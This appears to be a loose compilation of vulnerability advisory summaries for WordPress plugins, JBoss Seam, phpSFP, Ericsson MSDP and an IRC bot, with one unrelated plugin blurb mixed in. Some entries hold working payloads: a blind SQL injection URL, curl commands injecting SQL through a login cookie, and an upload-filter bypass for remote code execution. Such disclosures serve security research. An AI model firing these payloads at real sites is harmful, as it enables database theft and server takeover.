ShareaholicAdmin::add_location is accessible to every registered user. $_POST['location'] is not escaped, which allows an attacker to inject malicious JavaScript code.
WordPress All In One WP Security & Firewall 3.9.0 suffers from a Blind SQL Injection vulnerability. Some pages rely on the WordPress esc_sql function, and esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/). PoC: http://VICTIM/wp-admin/admin.php?page=aiowpsec_list_locked_ips&orderby=id%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))vLhA)%20AND%20%27QNKk%27=%27QNKk
Versions of the JBoss Seam 2 framework < 2.2.1CR2 fail to properly sanitize inputs to some JBoss Expression Language expressions. As a result, attackers can gain remote code execution through the application server. This module leverages the RCE to upload and execute a meterpreter payload. Versions of the JBoss AS admin-console are known to be vulnerable to this exploit without requiring authentication. Tested against JBoss AS 5 and 6, running on Linux with JDKs 6 and 7. This module provides a more efficient method of exploitation: it does not loop to find the desired Java classes and methods.
Pitbull-w3tw0rk_hunter is a PoC exploit for the Pitbull or w3tw0rk IRC bot that takes over the owner of the bot, which then allows remote code execution.
Work the Flow File Upload. Embed HTML5 user file uploads and workflows into pages and posts. Multiple-file drag-and-drop upload, image gallery display, reordering and archiving. This two-in-one plugin provides shortcodes to embed front-end user file upload capability and/or a step-by-step workflow.
Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.
The videowhisper-video-conference-integration WordPress plugin v4.91.8 allows various remote unauthenticated file uploads. Among the permitted file types is html, and only the last 4 characters of the file name are checked against the list of allowed types. Because of this, .shtml can be passed through, giving remote code execution if SSI is allowed. The code does not do any user access validation, and therefore anyone can upload the following files to an unsuspecting WordPress site: .shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps. The if (strstr($filename,'.php')) exit; check can be bypassed by using the extension .Php, and the file extension check would still allow files like test.Php.shtml.
There are many possible ways to do SQLi; I will go with error-based, which is enabled by default on phpSFP xD $ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or extractvalue(rand(),concat(0x2e,user())) or '1|||1" In case you don't know, for further queries you have to change 'user()' to something else, e.g. $ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or extractvalue(rand(),concat(0x2e,database())) or '1|||1"
A vulnerability in the WordPress plugin Simple Ads Manager allows an attacker to gain access to sensitive information such as user and author details, categories, tags, posts, and stats. The vulnerable file is simple-ads-manager/sam-ajax-admin.php and the vulnerable function is load_users. An attacker can exploit this vulnerability by sending a POST request to the vulnerable file with the action parameter set to load_users.